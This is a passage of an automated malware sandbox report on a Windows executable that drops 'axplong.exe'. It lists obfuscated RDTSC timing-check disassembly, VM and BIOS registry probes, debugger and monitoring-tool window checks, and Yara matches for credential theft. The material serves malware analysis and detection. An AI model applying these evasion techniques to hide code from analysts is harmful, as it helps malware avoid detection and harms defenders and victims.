Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60101 second address: 4B6013C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F3A94CD4089h 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3A94CD407Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B6013C second address: 4B60158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60158 second address: 4B6015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B6015C second address: 4B6016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B6016F second address: 4B60187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD4084h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60187 second address: 4B6018B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B6018B second address: 4B601B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3A94CD407Eh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3A94CD407Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B601B1 second address: 4B601B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B601B7 second address: 4B601BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B601BD second address: 4B601C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B601C1 second address: 4B601E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, edx 0x00000010 call 00007F3A94CD407Dh 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B601E0 second address: 4B60246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A9502B5ECh 0x00000008 mov ecx, 643002E1h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, esi 0x00000011 jmp 00007F3A9502B5ECh 0x00000016 push eax 0x00000017 pushad 0x00000018 movsx edx, ax 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d jmp 00007F3A9502B5EFh 0x00000022 mov esi, dword ptr [ebp+08h] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F3A9502B5EEh 0x0000002e jmp 00007F3A9502B5F5h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60246 second address: 4B60263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3A94CD4087h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60263 second address: 4B60286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jmp 00007F3A9502B5F2h 0x0000000d mov dword ptr [esp], edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60286 second address: 4B6028C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B603A4 second address: 4B603F3 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2ECFB96Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov dh, ah 0x0000000c pushfd 0x0000000d jmp 00007F3A9502B5F7h 0x00000012 and cx, 71AEh 0x00000017 jmp 00007F3A9502B5F9h 0x0000001c popfd 0x0000001d popad 0x0000001e popad 0x0000001f test byte ptr [esi+48h], 00000001h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B603F3 second address: 4B603F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B603F9 second address: 4B603FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50716 second address: 4B5071C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B5071C second address: 4B50720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50720 second address: 4B50787 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 mov dh, 1Ah 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F3A94CD4083h 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F3A94CD4086h 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F3A94CD4087h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50787 second address: 4B507CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov bx, 5E46h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c and esp, FFFFFFF8h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F3A9502B5F9h 0x00000018 xor si, 77A6h 0x0000001d jmp 00007F3A9502B5F1h 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B507CA second address: 4B50823 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F3A94CD407Ch 0x0000000c add eax, 1F97B548h 0x00000012 jmp 00007F3A94CD407Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F3A94CD4084h 0x00000021 adc cx, 77A8h 0x00000026 jmp 00007F3A94CD407Bh 0x0000002b popfd 0x0000002c movzx eax, bx 0x0000002f popad 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50823 second address: 4B50827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50827 second address: 4B5082D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B5082D second address: 4B50873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 29D453ABh 0x00000008 pushfd 0x00000009 jmp 00007F3A9502B5F0h 0x0000000e sub eax, 59ADE538h 0x00000014 jmp 00007F3A9502B5EBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3A9502B5F5h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50873 second address: 4B50883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50883 second address: 4B50892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50892 second address: 4B50896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50896 second address: 4B5089A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B5089A second address: 4B508A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B508A0 second address: 4B5094D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3A9502B5EEh 0x00000013 xor si, 6458h 0x00000018 jmp 00007F3A9502B5EBh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F3A9502B5F8h 0x00000024 sub ax, EEB8h 0x00000029 jmp 00007F3A9502B5EBh 0x0000002e popfd 0x0000002f popad 0x00000030 mov esi, dword ptr [ebp+08h] 0x00000033 pushad 0x00000034 mov al, 23h 0x00000036 jmp 00007F3A9502B5F1h 0x0000003b popad 0x0000003c sub ebx, ebx 0x0000003e jmp 00007F3A9502B5F7h 0x00000043 test esi, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F3A9502B5F5h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B5094D second address: 4B509DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F3B07529AADh 0x00000010 pushad 0x00000011 push edi 0x00000012 call 00007F3A94CD4080h 0x00000017 pop eax 0x00000018 pop ebx 0x00000019 mov dx, ax 0x0000001c popad 0x0000001d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000024 pushad 0x00000025 mov edi, ecx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F3A94CD4082h 0x0000002e add ecx, 16C2DF68h 0x00000034 jmp 00007F3A94CD407Bh 0x00000039 popfd 0x0000003a jmp 00007F3A94CD4088h 0x0000003f popad 0x00000040 popad 0x00000041 mov ecx, esi 0x00000043 pushad 0x00000044 mov esi, 1B78B39Dh 0x00000049 mov edx, eax 0x0000004b popad 0x0000004c je 00007F3B07529A4Fh 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F3A94CD407Bh 0x00000059 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B509DD second address: 4B509E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B509E4 second address: 4B50A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test byte ptr [77436968h], 00000002h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3A94CD407Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B50A00 second address: 4B50A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F3B07880F8Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Special instruction interceptor: First address: 1CEA2E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Special instruction interceptor: First address: 378365 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Special instruction interceptor: First address: 1CEA22 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Special instruction interceptor: First address: 3F7884 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: C4EA2E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: DF8365 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: C4EA22 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: E77884 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Code function: 1_2_04BD02BD rdtsc 1_2_04BD02BD
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 445
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 2811
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 2914
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 966
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 601
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5780 Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5780 Thread sleep time: -128064s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5804 Thread sleep count: 53 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5804 Thread sleep time: -106053s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6656 Thread sleep count: 445 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6656 Thread sleep time: -13350000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6992 Thread sleep time: -720000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4368 Thread sleep count: 52 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4368 Thread sleep time: -104052s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460 Thread sleep count: 2811 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460 Thread sleep time: -5624811s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356 Thread sleep count: 2914 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356 Thread sleep time: -5830914s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356 Thread sleep count: 966 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356 Thread sleep time: -1932966s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460 Thread sleep count: 601 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460 Thread sleep time: -1202601s >= -30000s
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: axplong.exe, axplong.exe, 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 9ICG2PuZbG.exe, 00000001.00000002.2156468731.000000000034E000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2186759224.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2186680442.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@C)
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Code function: 1_2_04BD02BD rdtsc 1_2_04BD02BD
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C1645B mov eax, dword ptr fs:[00000030h] 9_2_00C1645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C1A1C2 mov eax, dword ptr fs:[00000030h] 9_2_00C1A1C2
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: axplong.exe, axplong.exe, 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: ,cDProgram Manager
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00BFD312 cpuid 9_2_00BFD312
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00BFCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 9_2_00BFCB1A
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00BE65B0 LookupAccountNameA, 9_2_00BE65B0

Stealing of Sensitive Information

Source: Yara match File source: 1.2.9ICG2PuZbG.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.axplong.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.axplong.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.axplong.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2156374942.0000000000161000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.2116109167.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2723052390.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2186588517.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2145696772.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2145827348.00000000053B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2186678248.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY